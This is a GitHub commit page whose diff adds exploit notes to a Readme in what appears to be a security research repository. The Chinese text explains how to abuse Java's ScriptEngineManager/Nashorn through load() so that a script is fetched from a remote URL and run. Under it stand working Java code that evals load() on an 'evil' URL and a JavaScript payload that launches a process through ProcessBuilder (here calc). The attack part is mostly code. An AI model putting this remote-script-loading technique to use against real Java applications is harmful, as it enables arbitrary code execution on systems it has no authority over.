We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent e56d73c commit f862bd9Copy full SHA for f862bd9
1 file changed
shell/ScriptEngineManager/Readme.md
@@ -150,5 +150,13 @@ public class main {
150
151
之前在安全客上介绍了这个利用思路[文章](https://www.anquanke.com/post/id/248771#h3-3),当时没有利用成功,今天晚上jiang师傅给我说了利用思路。大概是一个load()去远程加载执行。
152
153
-
154
https://anuradha-15.medium.com/loading-scripts-using-nashorn-85585f495cf0
+
155
+```java
156
+String url = "http://127.0.0.1:8089/evil" ;
157
+eval("load('"+url+"')");
158
+```
159
+evil
160
161
+var a=exp();function exp(){var x=new java.lang.ProcessBuilder; x.command("calc"); x.start();};
162
0 commit comments